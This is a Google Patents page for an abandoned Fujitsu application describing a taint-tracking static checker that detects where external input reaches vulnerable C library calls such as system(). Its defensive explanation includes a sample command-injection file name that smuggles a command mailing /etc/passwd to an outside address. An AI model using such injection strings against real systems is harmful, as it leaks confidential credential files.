US20070271617A1 - Vulnerability check program, vulnerability check apparatus, and vulnerability check method - Google Patents

Vulnerability check program, vulnerability check apparatus, and vulnerability check method Download PDF

Info

Publication number
US20070271617A1
US20070271617A1 US11/832,779 US83277907A US2007271617A1 US 20070271617 A1 US20070271617 A1 US 20070271617A1 US 83277907 A US83277907 A US 83277907A US 2007271617 A1 US2007271617 A1 US 2007271617A1
Authority
US
United States
Prior art keywords
vulnerability
variable
program
checked
determination
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Abandoned
Application number
US11/832,779
Inventor
Masashi Mitomo
Satoru Torii
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Fujitsu Ltd
Original Assignee
Fujitsu Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Fujitsu Ltd filed Critical Fujitsu Ltd
Assigned to FUJITSU LIMITED reassignment FUJITSU LIMITED ASSIGNMENT OF ASSIGNORS INTEREST (SEE DOCUMENT FOR DETAILS). Assignors: TORII, SATORU, MITOMO, MASASHI
Assigned to FUJITSU LIMITED reassignment FUJITSU LIMITED RECORD TO CORRECT THE ASSIGNEE'S ADDRESS. CORRECT ADDRESS IS 1-1, KAMIKODANAKA 4-CHOME NAKAHARA-KU KAWASAKI-SHI KANAGAWA 211-8588 JAPAN RECORDED ON 019637/0619 Assignors: TORII, SATORU, MITOMO, MASASHI
Publication of US20070271617A1 publication Critical patent/US20070271617A1/en
Abandoned legal-status Critical Current

Links

Images

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00Arrangements for program control, e.g. control units
    • G06F9/06Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44Arrangements for executing specific programs
    • G06F9/445Program loading or initiating
    • G06F9/44589Program code verification, e.g. Java bytecode verification, proof-carrying code

Definitions

  • the present invention relates to a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method that check a program so as to detect vulnerability.
  • a program vulnerability check technique is roughly divided into a static check and a dynamic check.
  • Vulnerability is a kind of bugs which may cause serious damage, such as system down, system takeover, and information leakage, to program users, if abused, and is also called “security hole”.
  • the static check is a check not involving execution of a program.
  • a typical static check reads in source code, searches for the names of known vulnerable libraries (including system functions), and outputs an alert message together with information indicating the location in which the vulnerable libraries are used. With this operation, the static check prevents a programmer from containing vulnerability in source code.
  • the dynamic check is a check involving execution of a program.
  • a typical dynamic check gives input data to a program while monitoring a memory and the like to execute source code line by line, and outputs an alert message if a problem occurs in the source code.
  • Patent Document 1 is known as a prior art relating to the present invention.
  • a computer process resource modelling method and apparatus disclosed in Patent Document 1 analyzes components constituting a computer program and determines the influence that the components exert on the resource. If a violation of resource's predetermined behavior is detected, a notification is made as a programming error.
  • Patent Document 1 PCT Publication No. 10-509258
  • the conventional static check typically depends upon a simple pattern matching for vulnerable library names and outputs an alert message for all vulnerable libraries used in the source code. That is, the conventional static check may issue an alert even for vulnerable libraries which are used in a proper manner, so that a programmer needs to cope with a large number of alert massages.
  • a checker needs to create a test set which is a set of input data to be given to a program. It is difficult and disadvantageous in cost to create the test set in such a manner to cover various types of vulnerabilities, which raise the threshold for the dynamic check.
  • the present invention has been made to solve the above problem, and an object thereof is to provide a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method capable of detecting only a location at which the vulnerable library is not properly used.
  • a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
  • the determination rule includes a definition of a vulnerable argument in a library function.
  • the variable managed by the variable management step includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
  • the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value.
  • the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
  • the program to be checked is source code or an intermediate language file.
  • a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
  • a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output section that outputs an alert message concerning the vulnerability detected by the vulnerability determination section.
  • the determination rule includes a definition of a vulnerable argument in a library function.
  • the variable managed by the variable management section includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
  • the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
  • the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
  • the program to be checked is source code or an intermediate language file.
  • a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output section that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination section.
  • a vulnerability check method for detecting vulnerability of a program to be checked comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
  • a vulnerability check method for detecting vulnerability of a program to be checked comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
  • FIG. 1 is source code showing an example of a vulnerable program
  • FIG. 2 is a display showing an example of a normal execution result of a vulnerable program
  • FIG. 3 is source code showing an example of a secure program
  • FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention.
  • FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention.
  • FIG. 6 is a flowchart showing an example of operation of variable processing according to the present invention.
  • FIG. 7 is a view showing an example of an alert message according to the present invention.
  • FIG. 8 is a view showing an example of an intermediate language file
  • FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention.
  • FIG. 10 is source code showing an example of the content of a program correction method according to the present invention.
  • the present invention is a technique that traces the data flow with an input of external data as a starting point and detects a location at which the external data is directly passed to a dangerous library.
  • a vulnerability check apparatus that detects vulnerability contained in the source code of C-language and issues an alert to warn a programmer of the detected vulnerability will be described.
  • FIG. 1 shows a vulnerable program “test1.c” as a first program to be checked.
  • the “test1.c” is a program that allows a user to input a file name to output detailed information (access restriction, owner, size, last update date, etc.) of a file corresponding to the file name.
  • the “test1.c” first performs input processing of a file name in the 9th to 11th lines. Subsequently, in the 13th line, the “test1.c” uses the file name to generate a command character string to be passed to Unix® shell. In this case, “Is-I filename” is used to output the detailed information of the corresponding file. Subsequently, in the 14th line, the “test1.c” passes the command character string to Unix® shell.
  • FIG. 2 shows a normal execution result obtained when an existing adequate file name is input.
  • test1.c is a vulnerable program which may be exploited.
  • a malicious user may input, e.g., “example.txt; mail foo@fuga.com ⁇ /etc/passwd” as a file name.
  • the “test1.c” displays the detailed information of a file “example.txt” as proper operation, but executes a command to transmit a password file to “foo@fuga.com” by mail. That is, confidential information is leaked.
  • test2.c obtained by solving the problem of “test1.c” is shown in FIG. 3 .
  • the “test2.c” checks an input file name.
  • a function “Check_file_name” (defined in the 23th to 36th lines) is called to check an input file name. If the file name does not pass the check, the “test2.c” does not process the file name and terminates. As a result, the problem in the “test1.c” does not occur in the “test2.c”.
  • Check_file_name This function checks whether a character other than alphameric character, “.” (period), “-” (hyphen), and “_” (underbar) is included in the character string of the file name, because it is considered that only these characters are sufficient for expressing a file name. That is, restriction of characters to be used in the file name prevents an abusive input like the problem in the “test1.c”.
  • FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention.
  • the vulnerability check apparatus shown in FIG. 4 includes a program input section 11 , a variable management section 21 , a determination rule management section 22 , a processing flow trace section 31 , a vulnerability determination section 32 , and an alert message output section 41 .
  • the determination rule management section 22 manages a previously defined determination rule for vulnerability.
  • the determination rule describes a function using an exterior input or argument of a vulnerable library.
  • the determination rule may previously be stored in a memory or may previously be stored in a file so as to be read in at the start-up time. This file may be customized by a user.
  • the program input section 11 reads in source code, parses the source code, and passes the processing flow to the processing flow trace section 31 .
  • This can be implemented by using a function of a C-language compiler. Since the C-language complier parses source code to generate an intermediate language file, the intermediate language is used as the processing flow.
  • the source code may include a plurality of files.
  • the processing flow trace section 31 extracts an externally input variable whose value is externally input and passes information concerning the variable to the variable management section 21 . Further, the processing flow trace section 31 traces the externally input variable according to the processing flow and extracts a location at which the traced variable is processed as a vulnerable argument of a library function. As the extraction criterion, the determination rule is used.
  • the variable management section 21 manages information of each variable obtained from the processing flow trace section 31 as a table.
  • the each variable information includes variable name, attribute, position (represented by source file name and line number) at which the attribute has been set.
  • the attribute for argument or variable includes “unset” which is a state immediately after variable declaration, “normal” which is a state where a given value has been set and does not belong to any other state, “taint” which is a state where an external input has been made and thus it is likely to generate vulnerability, and “checked” which is a state where check has been made to confirm that the target argument or variable is non-tainted.
  • a variable whose attribute is “taint” is called tainted variable.
  • the vulnerability determination section 32 determines whether a tainted variable is used as an argument of the vulnerable library defined by the determination rule.
  • the alert output section 41 generates an alert massage concerning vulnerability and outputs the alert massage on a screen or file.
  • FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention.
  • the program input section 11 reads in a program and passes the read program to the processing flow trace section 31 (S 11 ). Then, the processing flow trace section 31 extracts an externally input variable according to the determination rule and stores it in the variable table of the variable management section S 12 . Then, the processing flow trace section 31 determines there remains any unchecked variable (S 13 ). If there remains any unchecked variable (Y in S 13 ), the processing flow trace section 31 selects one unchecked variable and checks it (S 14 ), and the flow returns to step S 13 . If there is no unchecked variable (N in S 13 ), this flow is ended.
  • step S 14 the processing flow trace section 31 and vulnerability determination section 32 check the selected variable.
  • FIG. 6 is a flowchart showing an example of operation of the variable check according to the present invention.
  • the processing flow trace section 31 advances the read program by one line (S 21 ). Then, the processing flow trace section 31 determines the program has terminated (S 22 ). If the program has terminated (Y in S 22 ), this flow is ended. If the program has not yet terminated (N in S 22 ), the processing flow trace section 31 determines whether the program has diverged or not (S 23 ). If the program has not diverged (N in S 23 ), the flow shifts to step S 31 . If the program has diverged (Y in S 23 ), the processing flow trace section 31 stores, in the variable table, a variable in the branch location which corresponds to the selected variable (S 24 ).
  • the processing flow trace section 31 determines whether the attribute of the stored variable has been checked (S 31 ). If the attribute of the stored variable has been checked (Y in S 31 ), this flow is ended. If the attribute of the stored variable has not been checked (N in S 31 ), the processing flow trace section 31 determines whether the unchecked variable is used in a function (S 32 ). If the variable is not used in a function (N in S 32 ), the flow returns to step S 21 . If the variable is used in a function (Y in S 32 ), the vulnerability determination section 32 determines whether a tainted variable is generated due to transition of the attribute of each variable (S 41 ).
  • step S 12 a function using an external input which has been previously defined and arguments (argc, argv) passed to main function are used to extract the externally input variable.
  • arguments argc, argv
  • the function using an external input its name and location of the argument in which a tainted value can be placed are previously defined in the determination rule. This definition needs to be made in consideration of the use of respective functions. For example, with regard to fgets function, definition is made as follows.
  • the fgets function is used such that an externally input value is placed in a first argument, so that this definition means that the first argument is “taint” and arguments other than the first argument and return values are “non-tainted”.
  • This definition means that the attribute of a first argument inherits the attribute of a fourth argument in snprintf function. That is, if the fourth argument is “taint”, the first attribute is “taint”, and if the fourth argument is “non-tainted”, the first attribute is “non-tainted”.
  • This definition means that when a first argument is “taint” in the system function, an alert message is generated. That is, when the first argument is “taint”, this function is likely to exhibit abnormal behavior, that is, this function has vulnerability.
  • step S 31 check is made to determine whether the attribute of a variable has been checked or not. For example, when a check function such as isalnumo is called with a target variable set as an argument, the attribute of the target variable becomes “checked”. Further, when a target variable is used in a conditional expression containing a comparison operator, the attribute of the target variable becomes “checked”.
  • step S 44 an alert message concerning vulnerability is generated and output to a screen or file.
  • FIG. 7 is a view showing an example of an alert message according to the present invention.
  • detection number, function name, and location of argument are output as the alert message.
  • Descriptions about vulnerability such as function name, degree of risk, threat, comment are previously defined in the determination rule and are associated with the ID of the detected vulnerability.
  • the location at which the tainted data has been set is stored in the variable table, and set function name, file name, line number and the like are output therefrom.
  • the location at which a vulnerable library is used can be acquired from the current position of the flow tracing, and used function name, file name line number and the like are output therefrom.
  • the vulnerability check apparatus determines that it is likely that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
  • the vulnerability check apparatus determines that it is likely that the attribute of the variable file_name is passed to the variable is_command and that the attribute of the variable Is_command is “taint”.
  • the vulnerability check apparatus determines that it is likely that the system function processes a tainted variable and that vulnerability is generated. Then, the vulnerability check apparatus outputs an alert message to warn a programmer or the like of the detected vulnerability.
  • the vulnerability check apparatus determines that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
  • the vulnerability check apparatus determines that the value of the variable file_name has been checked by a function Check_file_name in 13th line and that the attaribute of the variable file_name is “checked”.
  • the vulnerability check apparatus determines that the attribute of variable file_name has been passed to variable Is_command and that the attribute of variable Is_command is “checked”.
  • variable Is_command is used as an argument of system function in 19th line
  • the vulnerability check apparatus determines that system function processes a variable having a “checked” attribute, that is, determines that it is unlikely that vulnerability is generated.
  • alert message is output for one variable in the present embodiment
  • a plurality of alert messages for the same variable may be merged.
  • alert messages there is often a case where a process in a program diverges due to appearance of if statement and different processing may be applied to the same variable in the branch locations. In this case, there may be a case where vulnerability that is likely to pose a serious risk is detected in one branch location and vulnerability rated low risk is detected in the other branch location.
  • To separately output alert messages for both the cases is redundant for a user and, therefore, it is often preferable that the alert messages be merged.
  • a method of merging the alert messages there is one that uses an alert message of the highest severity and discards the other alert messages.
  • vulnerability check is performed by processing the source code in the present embodiment, it may be performed by processing an intermediate language file.
  • the source code readable by humans is compiled and translated into a computer-executable machine language.
  • a compiler generates an intermediate language file which is an intermediate file in the above translation process and can output the file onto a disk.
  • the intermediate language file is one that represents the source code in the form of nodes unit by unit.
  • the intermediate code is inferior in human readability than source code, but not more difficult in decoding than machine language.
  • FIG. 8 is a view showing an example of the intermediate language file.
  • the vulnerability check apparatus In the case where such intermediate language is read in, the vulnerability check apparatus generates a data flow in the form of a tree structure. Although data form is different, processing of vulnerability check can be performed in a manner similar to the case of source code.
  • FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention.
  • the same reference numerals as those in FIG. 4 denote the same or corresponding parts as those in FIG. 4 , and the descriptions thereof will be omitted here.
  • the apparatus shown in FIG. 9 differs from that of FIG. 4 in the point that a correction output section 51 is provided in place of the alert output section 41 so as to automatically correct a program.
  • a program correction method for vulnerability may previously be defined in the determination rule.
  • one field is added to the determination rule concerning system function, and the type of the program correction method is described in the field as follows.
  • FIG. 10 is source code showing an example of the content of a program correction method according to the present invention.
  • This program correction method 3 inserts, immediately before using system function, logic for checking a string variable used as an argument of the system function. This logic checks whether a character, such as “
  • Invalid_String_Error(x) in FIG. 10 is a function defined in a different location and terminates a program by outputting an error.
  • the computer-readable medium mentioned here includes: a portable storage medium such as a CD-ROM, a flexible disk, a DVD disk, a magneto-optical disk, or an IC card; a database that holds computer program; another computer and database thereof; and a transmission medium on a network line.

Abstract

Disclosed is a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked. The program allows the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.

Description

    TECHNICAL FIELD
  • The present invention relates to a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method that check a program so as to detect vulnerability.
    • BACKGROUND ART
  • In general, a program vulnerability check technique is roughly divided into a static check and a dynamic check. Vulnerability is a kind of bugs which may cause serious damage, such as system down, system takeover, and information leakage, to program users, if abused, and is also called “security hole”.
  • First, the static check will be described.
  • Among libraries prepared for a given program language, there exist libraries that should not be used or required to be treated with care since they may cause vulnerability. These libraries are called “vulnerable libraries”. For example, it is said that, in the case of C-language, a library such as “strcpy” which may cause buffer overflow vulnerability which is the most popular vulnerability should not be used but instead “strncpy” should be used. However, in actual source code, such a rule has not been validated.
  • The static check is a check not involving execution of a program. A typical static check reads in source code, searches for the names of known vulnerable libraries (including system functions), and outputs an alert message together with information indicating the location in which the vulnerable libraries are used. With this operation, the static check prevents a programmer from containing vulnerability in source code.
  • Next, dynamic check will be described.
  • The dynamic check is a check involving execution of a program. A typical dynamic check gives input data to a program while monitoring a memory and the like to execute source code line by line, and outputs an alert message if a problem occurs in the source code.
  • The following Patent Document 1 is known as a prior art relating to the present invention. A computer process resource modelling method and apparatus disclosed in Patent Document 1 analyzes components constituting a computer program and determines the influence that the components exert on the resource. If a violation of resource's predetermined behavior is detected, a notification is made as a programming error.
  • Patent Document 1: PCT Publication No. 10-509258
    • DISCLOSURE OF THE INVENTION
  • Problems to be solved by the Invention
  • If a programmer just does not make wrong use of a library, vulnerability does not occur even if the library is one that is generally regarded as vulnerable. For example, if “strcpy” library processes character-string constant, vulnerability cannot be generated. On the other hand, if “strcpy” library processes a character-string constant given from outside, such as a user of a program, buffer overflow vulnerability can be generated when a special character string is given from outside.
  • However, the conventional static check typically depends upon a simple pattern matching for vulnerable library names and outputs an alert message for all vulnerable libraries used in the source code. That is, the conventional static check may issue an alert even for vulnerable libraries which are used in a proper manner, so that a programmer needs to cope with a large number of alert massages.
  • Further, in the conventional dynamic check, a checker needs to create a test set which is a set of input data to be given to a program. It is difficult and disadvantageous in cost to create the test set in such a manner to cover various types of vulnerabilities, which raise the threshold for the dynamic check.
  • The present invention has been made to solve the above problem, and an object thereof is to provide a vulnerability check program, a vulnerability check apparatus, and a vulnerability check method capable of detecting only a location at which the vulnerable library is not properly used.
  • To solve the above problems, according to a first aspect of the present invention, there is provided a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
  • In the vulnerability check program according to the present invention, the determination rule includes a definition of a vulnerable argument in a library function.
  • In the vulnerability check program according to the present invention, the variable managed by the variable management step includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
  • In the vulnerability check program according to the present invention, the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value.
  • In the vulnerability check program according to the present invention, the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
  • In the vulnerability check program according to the present invention, the program to be checked is source code or an intermediate language file.
  • According to a second aspect of the present invention, there is provided a vulnerability check program allowing a computer to execute a vulnerability check method for detecting vulnerability of a program to be checked, the program allowing the computer to execute: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
  • According to a third aspect of the present invention, there is provided a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output section that outputs an alert message concerning the vulnerability detected by the vulnerability determination section.
  • In the vulnerability check apparatus according to the present invention, the determination rule includes a definition of a vulnerable argument in a library function.
  • In the vulnerability check apparatus according to the present invention, the variable managed by the variable management section includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
  • In the vulnerability check apparatus according to the present invention, the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
  • In the vulnerability check apparatus according to the present invention, the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
  • In the vulnerability check apparatus according to the present invention, the program to be checked is source code or an intermediate language file.
  • According to a fourth aspect of the present invention, there is provided a vulnerability check apparatus that detects vulnerability of a program to be checked, comprising: a determination rule management section that manages a determination rule concerning vulnerability; a program input section that reads in the program to be checked; a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management section that manages the information concerning the variable; a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output section that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination section.
  • According to a fifth aspect of the present invention, there is provided a vulnerability check method for detecting vulnerability of a program to be checked, comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
  • According to a sixth aspect of the present invention, there is provided a vulnerability check method for detecting vulnerability of a program to be checked, comprising: a determination rule management step that manages a determination rule concerning vulnerability; a program input step that reads in the program to be checked; a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable; a variable management step that manages the information concerning the variable; a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
    • BRIEF DESCRIPTION OF THE DRAWINGS
  • FIG. 1 is source code showing an example of a vulnerable program;
  • FIG. 2 is a display showing an example of a normal execution result of a vulnerable program;
  • FIG. 3 is source code showing an example of a secure program;
  • FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention;
  • FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention;
  • FIG. 6 is a flowchart showing an example of operation of variable processing according to the present invention;
  • FIG. 7 is a view showing an example of an alert message according to the present invention;
  • FIG. 8 is a view showing an example of an intermediate language file;
  • FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention; and
  • FIG. 10 is source code showing an example of the content of a program correction method according to the present invention.
    • BEST MODE FOR CARRYING OUT THE INVENTION
  • An Embodiment of the present invention will be described below with reference to the accompanying drawings.
  • The present invention is a technique that traces the data flow with an input of external data as a starting point and detects a location at which the external data is directly passed to a dangerous library. In the present invention, a vulnerability check apparatus that detects vulnerability contained in the source code of C-language and issues an alert to warn a programmer of the detected vulnerability will be described.
  • First, two programs to be checked will be described as an example.
  • FIG. 1 shows a vulnerable program “test1.c” as a first program to be checked. The “test1.c” is a program that allows a user to input a file name to output detailed information (access restriction, owner, size, last update date, etc.) of a file corresponding to the file name. The “test1.c” first performs input processing of a file name in the 9th to 11th lines. Subsequently, in the 13th line, the “test1.c” uses the file name to generate a command character string to be passed to Unix® shell. In this case, “Is-I filename” is used to output the detailed information of the corresponding file. Subsequently, in the 14th line, the “test1.c” passes the command character string to Unix® shell. FIG. 2 shows a normal execution result obtained when an existing adequate file name is input.
  • However, the “test1.c” is a vulnerable program which may be exploited. A malicious user may input, e.g., “example.txt; mail foo@fuga.com </etc/passwd” as a file name. In this case, the “test1.c” displays the detailed information of a file “example.txt” as proper operation, but executes a command to transmit a password file to “foo@fuga.com” by mail. That is, confidential information is leaked.
  • Next, as an example of a second program to be checked, a secure program “test2.c” obtained by solving the problem of “test1.c” is shown in FIG. 3. Unlike the “test1.c”, the “test2.c” checks an input file name. A function “Check_file_name” (defined in the 23th to 36th lines) is called to check an input file name. If the file name does not pass the check, the “test2.c” does not process the file name and terminates. As a result, the problem in the “test1.c” does not occur in the “test2.c”.
  • Here, a simple description is given of the function “Check_file_name”. This function checks whether a character other than alphameric character, “.” (period), “-” (hyphen), and “_” (underbar) is included in the character string of the file name, because it is considered that only these characters are sufficient for expressing a file name. That is, restriction of characters to be used in the file name prevents an abusive input like the problem in the “test1.c”.
  • Next, a configuration of the vulnerability check apparatus according to the present invention will be described. FIG. 4 is a block diagram showing an example of a configuration of the vulnerability check apparatus according to the present invention. The vulnerability check apparatus shown in FIG. 4 includes a program input section 11, a variable management section 21, a determination rule management section 22, a processing flow trace section 31, a vulnerability determination section 32, and an alert message output section 41.
  • The determination rule management section 22 manages a previously defined determination rule for vulnerability. The determination rule describes a function using an exterior input or argument of a vulnerable library. The determination rule may previously be stored in a memory or may previously be stored in a file so as to be read in at the start-up time. This file may be customized by a user.
  • The program input section 11 reads in source code, parses the source code, and passes the processing flow to the processing flow trace section 31. This can be implemented by using a function of a C-language compiler. Since the C-language complier parses source code to generate an intermediate language file, the intermediate language is used as the processing flow. The source code may include a plurality of files. The processing flow trace section 31 extracts an externally input variable whose value is externally input and passes information concerning the variable to the variable management section 21. Further, the processing flow trace section 31 traces the externally input variable according to the processing flow and extracts a location at which the traced variable is processed as a vulnerable argument of a library function. As the extraction criterion, the determination rule is used.
  • The variable management section 21 manages information of each variable obtained from the processing flow trace section 31 as a table. The each variable information includes variable name, attribute, position (represented by source file name and line number) at which the attribute has been set. The attribute for argument or variable includes “unset” which is a state immediately after variable declaration, “normal” which is a state where a given value has been set and does not belong to any other state, “taint” which is a state where an external input has been made and thus it is likely to generate vulnerability, and “checked” which is a state where check has been made to confirm that the target argument or variable is non-tainted. A variable whose attribute is “taint” is called tainted variable.
  • The vulnerability determination section 32 determines whether a tainted variable is used as an argument of the vulnerable library defined by the determination rule. The alert output section 41 generates an alert massage concerning vulnerability and outputs the alert massage on a screen or file.
  • Next, operation of the vulnerability check apparatus according to the present invention will be described. FIG. 5 is a flowchart showing an example of operation of the vulnerability check apparatus according to the present invention.
  • The program input section 11 reads in a program and passes the read program to the processing flow trace section 31 (S11). Then, the processing flow trace section 31 extracts an externally input variable according to the determination rule and stores it in the variable table of the variable management section S12. Then, the processing flow trace section 31 determines there remains any unchecked variable (S13). If there remains any unchecked variable (Y in S13), the processing flow trace section 31 selects one unchecked variable and checks it (S14), and the flow returns to step S13. If there is no unchecked variable (N in S13), this flow is ended.
  • In step S14, the processing flow trace section 31 and vulnerability determination section 32 check the selected variable. FIG. 6 is a flowchart showing an example of operation of the variable check according to the present invention.
  • The processing flow trace section 31 advances the read program by one line (S21). Then, the processing flow trace section 31 determines the program has terminated (S22). If the program has terminated (Y in S22), this flow is ended. If the program has not yet terminated (N in S22), the processing flow trace section 31 determines whether the program has diverged or not (S23). If the program has not diverged (N in S23), the flow shifts to step S31. If the program has diverged (Y in S23), the processing flow trace section 31 stores, in the variable table, a variable in the branch location which corresponds to the selected variable (S24).
  • Then, the processing flow trace section 31 determines whether the attribute of the stored variable has been checked (S31). If the attribute of the stored variable has been checked (Y in S31), this flow is ended. If the attribute of the stored variable has not been checked (N in S31), the processing flow trace section 31 determines whether the unchecked variable is used in a function (S32). If the variable is not used in a function (N in S32), the flow returns to step S21. If the variable is used in a function (Y in S32), the vulnerability determination section 32 determines whether a tainted variable is generated due to transition of the attribute of each variable (S41). If the tainted variable is not generated (N in S41), the flow shifts to step S43. If the tainted variable is generated (Y in S41), the vulnerability determination section 32 sets the attribute of this variable to “taint” and stores the set attribute in the variable table S42. Then, the vulnerability determination section 32 determines whether vulnerability is generated in the variable according to the determination rule (S43). If vulnerability has not been generated (N in S43), the flow returns to step S21. If vulnerability has been generated (Y is S43), the alert output section 41 outputs an alert message (S44), and this flow is ended.
  • In step S12, a function using an external input which has been previously defined and arguments (argc, argv) passed to main function are used to extract the externally input variable. With regard to the function using an external input, its name and location of the argument in which a tainted value can be placed are previously defined in the determination rule. This definition needs to be made in consideration of the use of respective functions. For example, with regard to fgets function, definition is made as follows.
  • fgets: param 1=taint
